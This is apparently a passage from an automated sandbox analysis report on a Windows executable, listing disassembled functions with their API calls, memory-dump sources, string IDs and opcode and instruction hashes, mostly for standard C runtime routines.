                                            • Opcode Fuzzy Hash: 1ebad81db86a079ca83848a38f407bfd413141559dbed38acdb0258a5ef6856a
                                            • Instruction Fuzzy Hash: B6E0C23530192057C6211B08FE08ACBB7D49F29759F044C3BF980B2390C3B69C528BED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fea0a6d5229f9a29143a20dcf19732efa94f98388614fa6db1a76a1680d22abf
                                            • Instruction ID: 3ef88647bf0aa0466637d303d923cfad419d5bad590c8e91ec8f1420c65049f0
                                            • Opcode Fuzzy Hash: fea0a6d5229f9a29143a20dcf19732efa94f98388614fa6db1a76a1680d22abf
                                            • Instruction Fuzzy Hash: 2841F8B0F00118AFDB10DF58C841AEA7BA2AF89358F24816EF4099B351D775DD82CB59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ReadFile.KERNEL32(?,00000003,00000000,00414659,00000000,00000097,00000000,00000003,00000003,00414659,00000097,00004000), ref: 00413C69
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 45728a6a99d8bd0e54b28bbace65369d3e4575681ab9710159f3d5201e7f823d
                                            • Instruction ID: 64a35d2d35e8983b5461b7fddd4b7c477298c94a280978fd147c73891e7d2025
                                            • Opcode Fuzzy Hash: 45728a6a99d8bd0e54b28bbace65369d3e4575681ab9710159f3d5201e7f823d
                                            • Instruction Fuzzy Hash: 87119D72704602AFE704DE26D8C4A97F7A8FB94729F20852EF55593600EB30EC65CBE5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __wsopen_s
                                            • String ID:
                                            • API String ID: 3347428461-0
                                            • Opcode ID: 8086dca53eed77ec445f247d065570d3185db74af83228924b8cf8a0051c0b4b
                                            • Instruction ID: 69a1602558238e151ffad6b1f0febb3363f5514e86906c47ff362ba4943103dd
                                            • Opcode Fuzzy Hash: 8086dca53eed77ec445f247d065570d3185db74af83228924b8cf8a0051c0b4b
                                            • Instruction Fuzzy Hash: 1C112771A0421AAFCF05DF58E94199F7BF4EF48304F1540AAF809EB351DA30EA11CB68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec935d791f12daeffed6ca71ad7b371f85261c090978bed10bd1a8f9c98fe9cc
                                            • Instruction ID: 38d1798c7c4b45791e9bc66fe1daebc3070d261c9ba4dfeb1b0f682729783485
                                            • Opcode Fuzzy Hash: ec935d791f12daeffed6ca71ad7b371f85261c090978bed10bd1a8f9c98fe9cc
                                            • Instruction Fuzzy Hash: FDF0867260162456D6212A6AAD11BDA22D88F91339F51071FF8A4D31D1EA7CE8428AEE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • Module32First.KERNEL32(00000000,00000224), ref: 019D81F6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929883180.00000000019D7000.00000040.00000001.sdmp, Offset: 019D7000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_19d7000_file.jbxd
                                            Similarity
                                            • API ID: FirstModule32
                                            • String ID:
                                            • API String ID: 3757679902-0
                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction ID: 5f8c1689466cf8a362810f809fb5eb45519dd03fe592817e996a6f0cfd399a8a
                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction Fuzzy Hash: 1AF096315007116BE7213BF9988CF6FB6ECBF49665F104528E65AD14C1DB70E8494A61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00416318,004021DA,?,0041732F,004021DC,004021DA,?,f!@,?,00416242,00416318,004021DE,004021DA,004021DA,004021DA), ref: 004253A5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: d054ca1564cea1932355ddb4cf383b7f615155863817540b2c0aedf81d0218a2
                                            • Instruction ID: c5023009572780af115b4a288d79ee7e605764c9a009f6b5afbb3585be84856d
                                            • Opcode Fuzzy Hash: d054ca1564cea1932355ddb4cf383b7f615155863817540b2c0aedf81d0218a2
                                            • Instruction Fuzzy Hash: 66E0ED31302A35A7DB31A766BC05B5F76889B413E4FD12123EC05D6290CBFCDC4081AD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateFileW.KERNEL32(00000000,00000000,?,0042FB6C,?,?,00000000,?,0042FB6C,00000000,0000000C), ref: 0042F827
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 33a3a6bf65b0ef3d5d3f4036c0f9f9d0bb9ca62f2daaed945ad9faf4e247c3d8
                                            • Instruction ID: 02e237c5fdf5e7a72de8209e8ba17869ef4bed609ba47ff4101f7f3e5ba8f571
                                            • Opcode Fuzzy Hash: 33a3a6bf65b0ef3d5d3f4036c0f9f9d0bb9ca62f2daaed945ad9faf4e247c3d8
                                            • Instruction Fuzzy Hash: 43D06C3200020DBBDF028F84DD06EDA3BBAFB48715F014050BA185A060C732E821AB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • _free.LIBCMT ref: 0041D1D5
                                              • Part of subcall function 00424BD8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?), ref: 00424BEE
                                              • Part of subcall function 00424BD8: GetLastError.KERNEL32(?,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?,?), ref: 00424C00
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorFreeHeapLast_free
                                            • String ID:
                                            • API String ID: 1353095263-0
                                            • Opcode ID: dd227cadd09729b7694e5ce878f0d6dd5ce280f23aeb08eccb962174fcda62ac
                                            • Instruction ID: 67059ac2bfaca528a66e318dab88585f3f4dc5ee76f7ea23b5e1c2f38f2ae38f
                                            • Opcode Fuzzy Hash: dd227cadd09729b7694e5ce878f0d6dd5ce280f23aeb08eccb962174fcda62ac
                                            • Instruction Fuzzy Hash: 75C08C3110020CFBCF009B42D806F4E7FA8DB80368F600088F41057240CAB1EE009680
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 019D7EBE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929883180.00000000019D7000.00000040.00000001.sdmp, Offset: 019D7000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_19d7000_file.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction ID: 2ccfb7a860f160206ab7749b15fa2a4a4207539a8bbdde0fb88d4f48759a9bee
                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction Fuzzy Hash: 72112B79A00208EFDB01DF98C985E99BBF5AF08351F05C094F9489B362D771EA50DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LocalAlloc.KERNEL32(00000000,016C3BD0), ref: 004493DB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929630304.0000000000448000.00000020.00020000.sdmp, Offset: 00448000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_448000_file.jbxd
                                            Similarity
                                            • API ID: AllocLocal
                                            • String ID:
                                            • API String ID: 3494564517-0
                                            • Opcode ID: b0f6f88cb3d997f452aa78b764bbf1b821d51529428f674f7435ecd67f0b75a8
                                            • Instruction ID: d138825e958eef540703c836628a67ad5e2b911ac39aef1c7c85622753beed03
                                            • Opcode Fuzzy Hash: b0f6f88cb3d997f452aa78b764bbf1b821d51529428f674f7435ecd67f0b75a8
                                            • Instruction Fuzzy Hash: A5C09B751483145FD3109BD5FC45B35379CF304711F449015F94CC6754F67068504F55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __floor_pentium4
                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                            • API String ID: 4168288129-2761157908
                                            • Opcode ID: 784f5ee4e1825bd117dcf5262b5596a2cf0ce2a5eb9cfca1cf5357854f0cde77
                                            • Instruction ID: c8644981ff58625deab077397ef3a83461afa27c56065f4bec1578bd5624ce57
                                            • Opcode Fuzzy Hash: 784f5ee4e1825bd117dcf5262b5596a2cf0ce2a5eb9cfca1cf5357854f0cde77
                                            • Instruction Fuzzy Hash: CEC23971E046388BDB24CE29ED407EAB7B5EB49304F9541EBD84DE7240E778AE818F45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,f!@), ref: 0041D2D5
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,f!@), ref: 0041D2DF
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,f!@), ref: 0041D2EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID: f!@
                                            • API String ID: 3906539128-1230519027
                                            • Opcode ID: a3c60bb57505c20cddecf0e9eef7da80713cafcac41bb38ee95cd197495e05fa
                                            • Instruction ID: 49a7087f40e6b38d03ea6d539442bf6e5d8e261bebe98e8b95fa0d88050ed8bb
                                            • Opcode Fuzzy Hash: a3c60bb57505c20cddecf0e9eef7da80713cafcac41bb38ee95cd197495e05fa
                                            • Instruction Fuzzy Hash: F031D2B4D01228ABCB21DF24D989BCDBBB8AF08310F5041EAE41CA6250E7749BC18F48
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • too many codes, xrefs: 00411DAF
                                            • not enough codes, xrefs: 00411D93
                                            • bad compressed size, xrefs: 00411E75
                                            • output buffer too small for in-memory compression, xrefs: 00411CE7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: bad compressed size$not enough codes$output buffer too small for in-memory compression$too many codes
                                            • API String ID: 0-1974362290
                                            • Opcode ID: c6bd5adc19e14c474e418e2db97026603a5d5e64daee1f1162832f2fd3f105cb
                                            • Instruction ID: 585df4ed8e9b07e7c1a4c793ee436c9d7deb6d4646b455c78bb7b4b7eac3af9d
                                            • Opcode Fuzzy Hash: c6bd5adc19e14c474e418e2db97026603a5d5e64daee1f1162832f2fd3f105cb
                                            • Instruction Fuzzy Hash: 99D1D3707017058BC720DF65C4806FBB7E2FF89308F14492EE59A87251EB79B996CB86
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetCurrentProcess.KERNEL32(?,?,004230B0,?,?,?,?), ref: 004230D3
                                            • TerminateProcess.KERNEL32(00000000,?,004230B0,?,?,?,?), ref: 004230DA
                                            • ExitProcess.KERNEL32 ref: 004230EC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            • Opcode ID: 753c0fe24a20e17db3215f7c6e544d231d893764cdcb91a0a14c3322a12d95e0
                                            • Instruction ID: 4641eed48fe800a8baa9680a7538f420db501488afd34da024cfce8cedd1c2d0
                                            • Opcode Fuzzy Hash: 753c0fe24a20e17db3215f7c6e544d231d893764cdcb91a0a14c3322a12d95e0
                                            • Instruction Fuzzy Hash: 5DE0BF31600954AFCF116F59EC09E593B79FB41356B848425F80586131CF3EDE52CAA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ct_init: 256+dist != 512$ct_init: dist != 256$ct_init: length != 256
                                            • API String ID: 0-2704465662
                                            • Opcode ID: 7d2bfca88ee75decba766ea707fd6a4045b7a4c1b4f181c5400c8212a05615e0
                                            • Instruction ID: 4ae749fbce0dcb7128c47a2629b14458315149797c9c23bbc85e9c509837f6d0
                                            • Opcode Fuzzy Hash: 7d2bfca88ee75decba766ea707fd6a4045b7a4c1b4f181c5400c8212a05615e0
                                            • Instruction Fuzzy Hash: 0571D3356017868BE324CF25C5817EBB7E1FF89304F05493ED19A8B760E7B8A58AC745
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e5cc446a5ce37a8a00a79389eb33da02ba33ceb8d756ebeefd14d710bc9fd04
                                            • Instruction ID: 422bf7bce22379bf7c35242b617e41cbf690530914a680bc3efa2ec9ccfdf146
                                            • Opcode Fuzzy Hash: 4e5cc446a5ce37a8a00a79389eb33da02ba33ceb8d756ebeefd14d710bc9fd04
                                            • Instruction Fuzzy Hash: 90F18F71E00229AFDF14CFA9D9806AEB7B1FF88314F55826EE815A7340D774AE41CB84
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004327B8,?,?,00000008,?,?,00432450,00000000), ref: 004329EA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: 288c8de5e24d8a216a00935399d85f439440d1102022adce1179260b80335a2a
                                            • Instruction ID: 5084df8d617cf1b7af26dbeac821e44dad35285b3e9cdb0cc81778313233e75f
                                            • Opcode Fuzzy Hash: 288c8de5e24d8a216a00935399d85f439440d1102022adce1179260b80335a2a
                                            • Instruction Fuzzy Hash: 77B16B31610609DFD728CF28C586B657BE0FF09364F259659E89ACF3A1C379E982CB44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004168A7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FeaturePresentProcessor
                                            • String ID:
                                            • API String ID: 2325560087-0
                                            • Opcode ID: 632189a00c241fa9fb7b1aa27ad1916096d0275ff53a41008da8237ba516b3be
                                            • Instruction ID: 77e6049745c7a14439d999c07a7058cb41e5a02650618c9a28f2259d4586ca86
                                            • Opcode Fuzzy Hash: 632189a00c241fa9fb7b1aa27ad1916096d0275ff53a41008da8237ba516b3be
                                            • Instruction Fuzzy Hash: CC519BB69102058FEB28CF55DA807AABBF1FB49314F15C06AE905EB751D3B8D940CF58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8a33c47381c060320a2e568e91828c7740966ab5628aecb714f6b87538fffe70
                                            • Instruction ID: 6cddfe850f206f78913078f63fb83a3f2419717a531d66a5125c8d53871b3fba
                                            • Opcode Fuzzy Hash: 8a33c47381c060320a2e568e91828c7740966ab5628aecb714f6b87538fffe70
                                            • Instruction Fuzzy Hash: 8E31F772A00229AFCB24DF69DC89DBB77BAEB84310F94415DFD1593241EA34AE50CB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00016C03,004166BF), ref: 00416BFC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 56b75bb612414a1f1baf54a08eff3f171e4fc8b4486b45a8df0d72fcded1bab7
                                            • Instruction ID: 656200b8df6a99a7d526e88eb46b6253e1dda16edc7f6ea5b6404d4dd8feadc0
                                            • Opcode Fuzzy Hash: 56b75bb612414a1f1baf54a08eff3f171e4fc8b4486b45a8df0d72fcded1bab7
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            • Opcode ID: 0635be91e9a43ac54568cbb095152b7bfee3b8f7cd87ce42c848dc9a70d2291a
                                            • Instruction ID: 94f14f582f3bff31fa0ae3671d0ea0b8def13b318a35acd1be39364966ffd64b
                                            • Opcode Fuzzy Hash: 0635be91e9a43ac54568cbb095152b7bfee3b8f7cd87ce42c848dc9a70d2291a
                                            • Instruction Fuzzy Hash: AF613FB074060956CB389A298882BFF63A5EF01744F04051FE682DBB85D76DADC2C3CE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            • Opcode ID: 43f1a07a53d9d75a4fd978d4e96f84307978ef319edbd8efce3f5ac77a9beb4a
                                            • Instruction ID: b8da695107d77dbba82d047142eef0e5c45ccc3987ce70383cffd896a1c40b42
                                            • Opcode Fuzzy Hash: 43f1a07a53d9d75a4fd978d4e96f84307978ef319edbd8efce3f5ac77a9beb4a
                                            • Instruction Fuzzy Hash: A85135B0240648AADB289B2989957FF679BDB2134CF18441FE482D7392D71D9DC583CF
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapProcess
                                            • String ID:
                                            • API String ID: 54951025-0
                                            • Opcode ID: 13ef1b19647ce1f205dba017df90e3572e6e0f830ece238f191ef62609cb4563
                                            • Instruction ID: b20a65e82b641c4fcbe00e45d437bfb32a9135c2ff02e92e691d0702de4a1871
                                            • Opcode Fuzzy Hash: 13ef1b19647ce1f205dba017df90e3572e6e0f830ece238f191ef62609cb4563
                                            • Instruction Fuzzy Hash: 08A01230102901CB43044F315A0420C36A8750578131280386401C0220D62141005604
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 547438fd704ed4c5539c59f21ec4ce217702f62870f386ea797f08a33cec8ce3
                                            • Instruction ID: 13816131e5e5e20cd21594707c0bc2b9046144c43c141b4337f8b44b72fcd691
                                            • Opcode Fuzzy Hash: 547438fd704ed4c5539c59f21ec4ce217702f62870f386ea797f08a33cec8ce3
                                            • Instruction Fuzzy Hash: BA518171E00119EFDF04CF99D981AAEBBB2EF88314F58809DE515AB342C7389E51CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b5b169a0ac3e31ee4cdaa51f8b1a434c154ed2649169940f821f1aaa4f60f87
                                            • Instruction ID: fe4d31472708007f1091590df337c24a64514745b2f14192b9a487a4331d36e9
                                            • Opcode Fuzzy Hash: 7b5b169a0ac3e31ee4cdaa51f8b1a434c154ed2649169940f821f1aaa4f60f87
                                            • Instruction Fuzzy Hash: D721B373F204394B7B0CC57E8C522BDB6E1C78C601745823AF8A6EA2C1D968D917E2E4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 202bb8c0c00599add0fc0bcb6284eb3780e9334701fc9bb412ad2bd96266fea4
                                            • Instruction ID: ab1768e0b2de08a388fd18bb26ca37ce33fd0d795a298d93947561e7482b589e
                                            • Opcode Fuzzy Hash: 202bb8c0c00599add0fc0bcb6284eb3780e9334701fc9bb412ad2bd96266fea4
                                            • Instruction Fuzzy Hash: 1F118623F30C255B775C816D8C172BAA5D6EBDC25074F533ADC26E7284E9A4DE23D290
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: bfd98f030e4bf4ecbfc7c48afb0c1351b701486baaf1b9a10a3ad52f9e6a1722
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: 01113B7720008283E60DAE2DC4B85B793D5EECD327F2D627BF0514B744C22A9B459A08
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 900e58b90492d58245829199317ff5d5f168c31b2c00d97b283f1b75a57077df
                                            • Instruction ID: 7641c7e178061dc03834fba44f4d158e51030fa16b736c05c857efd4f4192e13
                                            • Opcode Fuzzy Hash: 900e58b90492d58245829199317ff5d5f168c31b2c00d97b283f1b75a57077df
                                            • Instruction Fuzzy Hash: 922165705260B15AD70C4B6AAC25437FBA0AB472133CB47AFD987DA0D2C53DD164E7A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc8394d30aa915151beb7fc35bbbb7b63de16f3cc9f67b56ad5c5aa0e15bed50
                                            • Instruction ID: 51affe5aab557a8067aebc31762701527af383da160f115fc725f3fd696cf84b
                                            • Opcode Fuzzy Hash: fc8394d30aa915151beb7fc35bbbb7b63de16f3cc9f67b56ad5c5aa0e15bed50
                                            • Instruction Fuzzy Hash: 26E08C72A11238EBCB15EB89D90598AF3FCEB44B44B51049BF901D3200C274DE00C7D4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$___from_strstr_to_strchr
                                            • String ID:
                                            • API String ID: 3409252457-0
                                            • Opcode ID: 558f08cb0ed8c3abf4531eadc4ea43454343a9820e0df4905791bd749f934d0e
                                            • Instruction ID: 7e24ff49c087647ecc1e827e4f778859024c9178dcebcd0d08c6e63b53638690
                                            • Opcode Fuzzy Hash: 558f08cb0ed8c3abf4531eadc4ea43454343a9820e0df4905791bd749f934d0e
                                            • Instruction Fuzzy Hash: 66D13871B00225AFDB20AF75B842B6E7BA8EF01714F84416FE911D7285EB3D99408BDC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ___free_lconv_mon.LIBCMT ref: 0042CDFF
                                              • Part of subcall function 0042C96A: _free.LIBCMT ref: 0042C987
                                              • Part of subcall function 0042C96A: _free.LIBCMT ref: 0042C999
                                              • Part of subcall function 0042C96A: _free.LIBCMT ref: 0042C9AB
                                              • Part of subcall function 0042C96A: _free.LIBCMT ref: 0042C9BD
                                              • Part of subcall function 0042C96A: _free.LIBCMT ref: 0042C9CF
                                              • Part of subcall function 0042C96A: _free.LIBCMT ref: 0042C9E1
                                              • Part of subcall function 0042C96A: _free.LIBCMT ref: 0042C9F3
                                              • Part of subcall function 0042C96A: _free.LIBCMT ref: 0042CA05
                                              • Part of subcall function 0042C96A: _free.LIBCMT ref: 0042CA17
                                              • Part of subcall function 0042C96A: _free.LIBCMT ref: 0042CA29
